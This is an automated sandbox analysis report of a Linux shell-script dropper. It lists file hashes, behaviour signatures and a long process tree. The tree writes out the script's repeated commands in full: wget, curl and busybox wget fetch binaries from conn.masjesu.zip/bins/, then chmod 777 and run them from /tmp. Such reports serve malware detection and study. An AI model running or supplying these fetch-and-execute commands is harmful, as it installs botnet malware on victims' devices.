Analysis
-
max time kernel
77s -
max time network
78s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mips image:debian9-mipsbe-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
21/11/2024, 06:53
Static task
static1
Behavioral task
behavioral1
Sample
9108d33f22fb170bfffd8fa9a24b7c087823d36b3e3b08d0a84ac9562c89ba46.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
9108d33f22fb170bfffd8fa9a24b7c087823d36b3e3b08d0a84ac9562c89ba46.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9108d33f22fb170bfffd8fa9a24b7c087823d36b3e3b08d0a84ac9562c89ba46.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
9108d33f22fb170bfffd8fa9a24b7c087823d36b3e3b08d0a84ac9562c89ba46.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
9108d33f22fb170bfffd8fa9a24b7c087823d36b3e3b08d0a84ac9562c89ba46.sh
-
Size
10KB
-
MD5
89550f6e6c530e2e689d60a56a4df5a4
-
SHA1
f5860c4d0ff43486d05d62f626f554dc70e97a56
-
SHA256
9108d33f22fb170bfffd8fa9a24b7c087823d36b3e3b08d0a84ac9562c89ba46
-
SHA512
bd1838359f068081fe2be6ec32996de963bf2e4e9787b6dd610712207a56fbbf82b24855a6068c08419301d92630704d60a8b549484f768d73250df56d5f3317
-
SSDEEP
192:rEQtGW4t957M1XHy5NK6e55EQtGWQXXHy5NneDy5:eX57Mr6eBeu5
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Reads runtime system information
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/9108d33f22fb170bfffd8fa9a24b7c087823d36b3e3b08d0a84ac9562c89ba46.sh/tmp/9108d33f22fb170bfffd8fa9a24b7c087823d36b3e3b08d0a84ac9562c89ba46.sh1⤵PID:719
-
/bin/rm/bin/rm bins.sh2⤵PID:723
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- System Network Configuration Discovery
PID:726
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- System Network Configuration Discovery
PID:750
-
-
/bin/chmodchmod 777 sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV./sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵PID:753
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- System Network Configuration Discovery
PID:754
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- System Network Configuration Discovery
PID:757
-
-
/bin/chmodchmod 777 jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ./jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- Executes dropped EXE
PID:759
-
-
/bin/rmrm jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵PID:760
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵PID:761
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:762
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵PID:770
-
-
/bin/chmodchmod 777 uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵
- File and Directory Permissions Modification
PID:775
-
-
/tmp/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV./uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵
- Executes dropped EXE
PID:776
-
-
/bin/rmrm uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵PID:780
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵
- System Network Configuration Discovery
PID:781
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵
- System Network Configuration Discovery
PID:809
-
-
/bin/chmodchmod 777 FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi./FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵
- Executes dropped EXE
PID:817
-
-
/bin/rmrm FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵PID:819
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- System Network Configuration Discovery
PID:820
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- System Network Configuration Discovery
PID:823
-
-
/bin/chmodchmod 777 mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz./mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- Executes dropped EXE
PID:825
-
-
/bin/rmrm mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵PID:826
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- System Network Configuration Discovery
PID:827
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- System Network Configuration Discovery
PID:837
-
-
/bin/chmodchmod 777 fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT./fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵PID:852
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵
- System Network Configuration Discovery
PID:854
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵PID:867
-
-
/bin/chmodchmod 777 ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF./ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵PID:870
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- System Network Configuration Discovery
PID:871
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵PID:874
-
-
/bin/chmodchmod 777 2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V./2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm 2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵PID:880
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵PID:881
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- System Network Configuration Discovery
PID:884
-
-
/bin/chmodchmod 777 gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd./gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵PID:887
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵PID:888
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵
- System Network Configuration Discovery
PID:891
-
-
/bin/chmodchmod 777 QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo./QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵PID:894
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- System Network Configuration Discovery
PID:895
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- System Network Configuration Discovery
PID:898
-
-
/bin/chmodchmod 777 1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z./1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm 1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵PID:901
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- System Network Configuration Discovery
PID:902
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- System Network Configuration Discovery
PID:905
-
-
/bin/chmodchmod 777 NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG./NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵PID:908
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- System Network Configuration Discovery
PID:909
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- System Network Configuration Discovery
PID:912
-
-
/bin/chmodchmod 777 ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS./ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵PID:915
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵PID:916
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- System Network Configuration Discovery
PID:919
-
-
/bin/chmodchmod 777 Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU9./Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵PID:922
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- System Network Configuration Discovery
PID:923
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵PID:926
-
-
/bin/chmodchmod 777 sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV./sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵PID:929
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- System Network Configuration Discovery
PID:930
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- System Network Configuration Discovery
PID:933
-
-
/bin/chmodchmod 777 jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ./jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵PID:936
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵
- System Network Configuration Discovery
PID:937
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵
- System Network Configuration Discovery
PID:940
-
-
/bin/chmodchmod 777 uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV./uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵PID:943
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵PID:944
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵PID:947
-
-
/bin/chmodchmod 777 FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi./FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵PID:950
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- System Network Configuration Discovery
PID:951
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- System Network Configuration Discovery
PID:954
-
-
/bin/chmodchmod 777 mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz./mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵PID:957
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- System Network Configuration Discovery
PID:958
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- System Network Configuration Discovery
PID:961
-
-
/bin/chmodchmod 777 fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT./fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵PID:964
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵PID:965
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵PID:968
-
-
/bin/chmodchmod 777 ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF./ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵PID:971
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- System Network Configuration Discovery
PID:972
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- System Network Configuration Discovery
PID:975
-
-
/bin/chmodchmod 777 1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z./1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm 1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵PID:978
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵PID:979
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- System Network Configuration Discovery
PID:982
-
-
/bin/chmodchmod 777 NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG./NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵PID:985
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- System Network Configuration Discovery
PID:986
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- System Network Configuration Discovery
PID:989
-
-
/bin/chmodchmod 777 ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS./ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- System Network Configuration Discovery
PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- System Network Configuration Discovery
PID:996
-
-
/bin/chmodchmod 777 Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU9./Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- System Network Configuration Discovery
PID:1003
-
-
/bin/chmodchmod 777 2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V./2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm 2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵PID:1006
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- System Network Configuration Discovery
PID:1007
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1008
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- System Network Configuration Discovery
PID:1010
-
-
/bin/chmodchmod 777 gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- File and Directory Permissions Modification
PID:1011
-
-
/tmp/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd./gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- Executes dropped EXE
PID:1012
-
-
/bin/rmrm gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵PID:1013
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵PID:1014
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1015
-
-
